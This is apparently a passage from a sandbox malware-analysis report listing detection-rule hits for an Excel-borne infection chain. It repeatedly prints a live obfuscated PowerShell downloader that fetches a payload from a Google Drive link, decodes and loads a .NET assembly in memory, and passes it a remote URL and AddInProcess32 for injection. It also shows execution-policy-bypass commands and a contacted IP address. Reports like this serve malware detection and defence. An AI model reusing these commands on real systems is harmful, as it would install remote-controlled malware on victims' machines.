bWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdk
ZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmlt
      Source: File created Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3404, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uwantskillthingstobegreatthingswitheveryonewithuthat[1].hta
      Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". 
( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87,
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". 
( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87,
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". 
( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87,
      Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'[Base64 blob removed]'+[CHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , ProcessId: 4080, ProcessName: wscript.exe
      Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[Base64 blob removed]';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[Base64 blob removed]
      Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'[Base64 blob removed]'+[CHAr]0X22+'))')))", CommandLine: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'[Base64 blob removed]
      Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io; Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3404, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3688, ProcessName: mshta.exe
      Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'[Base64 blob removed]'+[CHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt, ProcessId: 3876, ProcessName: powershell.exe
      Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'[Base64 blob removed]'+[CHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , ProcessId: 4080, ProcessName: wscript.exe
      Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[Base64 blob removed]';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[Base64 blob removed]
      Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'[Base64 blob removed]'+[CHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline", ProcessId: 3980, ProcessName: csc.exe
      Source: Network Connection; Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton; Data: DestinationIp: 24.199.88.84, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3404, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
      Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3772, TargetFilename: C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS
      Source: Network Connection; Author: X__Junior (Nextron Systems); Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3404, Protocol: tcp, SourceIp: 24.199.88.84, SourceIsIpv6: false, SourcePort: 443
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". 
( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87,
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') 